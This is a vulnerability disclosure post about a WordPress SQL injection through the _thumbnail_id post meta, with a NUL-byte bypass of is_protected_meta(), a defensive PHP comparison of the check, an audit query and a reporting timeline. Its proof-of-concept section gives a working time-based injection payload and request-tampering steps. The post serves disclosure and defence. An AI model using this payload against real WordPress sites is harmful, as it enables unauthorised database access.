Author: @Ambulong
I found this vulnerability after reading slavco’s post, and reported it to the WordPress team via HackerOne on Sep. 2nd, 2017. But, unfortunately, the WordPress team didn’t pay attention to this report either.
# SQL Injection Details
- Wordpress SQLi by slavco
- Wordpress SQLi — PoC by slavco
- Wordpress SQLi — how to find by slavco
- Disclosure: WordPress WPDB SQL Injection - Technical by ircmaxell
# POC Details
If you have already found the potential SQLi in WordPress, you will know that we need to insert our payload into the _thumbnail_id meta in order to launch the SQLi attack.
## Wordpress ≤ 4.7.4 Lack of capability checks for post meta data in the XML-RPC API
This vulnerability was mentioned in slavco’s post: Wordpress SQLi
Reference: WordPress 4.7.5 Security and Maintenance Release
POC
## Wordpress ≤ 4.8.2 POST Meta Protection Bypass
A MySQL trick
1). A normal query for _thumbnail_id
2). Change the meta_value of _thumbnail_id to “\x00_thumbnail_id”
3). Query by _thumbnail_id again
POST Meta Protection Bypass
This is the is_protected_meta() function (./wp-includes/meta.php) used to validate post meta keys:
The code only checks the first character of $meta_key, so, using the MySQL trick above, we can prefix the key with %00_ to bypass the check.
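To make the weakness concrete from the defender's side, here is an added example (not WordPress core code) that puts the first-character-only check the page describes next to a hypothetical hardened check that also rejects keys containing control bytes such as NUL; the sample keys are constructed for the demonstration.

```php
<?php
// Added example, not code from WordPress. Compares a first-byte-only
// protection check with a hardened one that refuses control bytes.

// Weak form: protected only when the first byte is '_'. A key starting
// with "\x00" passes, although MySQL's default collations compare it
// equal to the real key when it is later queried.
function is_protected_meta_weak(string $meta_key): bool {
    return isset($meta_key[0]) && '_' === $meta_key[0];
}

// Hypothetical hardened form: any ASCII control byte (NUL included)
// anywhere in the key makes it invalid, and invalid keys are treated
// as protected, i.e. the request is denied.
function meta_key_is_valid(string $meta_key): bool {
    return preg_match('/[\x00-\x1F\x7F]/', $meta_key) === 0;
}

function is_protected_meta_hardened(string $meta_key): bool {
    if (!meta_key_is_valid($meta_key)) {
        return true;
    }
    return isset($meta_key[0]) && '_' === $meta_key[0];
}

// Constructed sample keys: the real key, the NUL-prefixed variant and
// an ordinary user-defined custom field.
$samples = ["_thumbnail_id", "\x00_thumbnail_id", "my_custom_field"];
foreach ($samples as $key) {
    printf("%-24s weak=%-5s hardened=%s\n",
        json_encode($key),
        var_export(is_protected_meta_weak($key), true),
        var_export(is_protected_meta_hardened($key), true));
}
```

For an existing site, rows already stored with such a key can be audited with a query along the lines of `SELECT meta_id, post_id, HEX(meta_key) FROM wp_postmeta WHERE HEX(meta_key) LIKE '00%'` (assuming the default wp_ table prefix).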
POC
- Add New Custom Field, Name: `_thumbnail_id`, Value: `55 %1$%s or sleep(10)#`
- Click the "Add Custom Field" button.
- Modify the HTTP request: `_thumbnail_id` => `%00_thumbnail_id`
- Launch the attack. Visit `/wp-admin/edit.php?action=delete&_wpnonce=xxx&ids=55 %1$%s or sleep(10)#`.
Time-line:
- Sep. 2nd - I report the vulnerability to the WP team via HackerOne.
- Sep. 6th - The WP team asks for details.
- Sep. 6th - I post the details.
- Sep. 6th to now - I haven’t received any response yet…